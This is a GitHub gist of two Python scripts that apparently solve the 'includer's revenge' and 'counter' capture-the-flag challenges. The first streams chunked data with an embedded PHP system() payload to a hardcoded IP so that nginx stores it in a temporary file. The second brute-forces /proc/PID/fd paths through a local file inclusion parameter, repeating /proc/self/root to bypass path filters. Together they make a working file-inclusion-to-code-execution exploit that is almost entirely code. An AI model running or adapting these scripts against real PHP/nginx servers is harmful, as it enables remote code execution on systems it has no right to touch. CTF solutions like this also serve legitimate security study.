-
-
Save parrot409/3919a4e6ab1eae76d051c5a4d4cfa737 to your computer and use it in GitHub Desktop.
includer's revenge and counter solution - script written for counte but it's idea can be used for includer's revenge too - run both scripts at once - /tmp/b has a chunked body with random content - Including nginx temporary file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from pwn import remote | |
import time | |
# fill /tmp/g with `nc -lvnp 9000 > /tmp/g` and then `curl localhost:9000 -F a=@/dev/urandom` | |
q = open("/tmp/g","rb") | |
z = q.read(1024 * 1024 * 10) | |
while(True): | |
p = remote("49.12.232.139",8008) | |
for i in range(1000): | |
tosend = z[i*100:i*100+100] | |
if(i > 10): | |
tosend = tosend | |
tosend = tosend[:29]+b'<?php system("/readflag"); ?>' | |
p.send(tosend) | |
p.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import requests | |
while(True): | |
for k in range(36,38): | |
for j in range(10,40): | |
r = requests.get("http://49.12.232.139:8008/?page=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/"+str(k)+"/fd/"+str(j)) | |
if(len(r.text) > 0 ): | |
print("IT WORKS!") | |
print(r.text) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment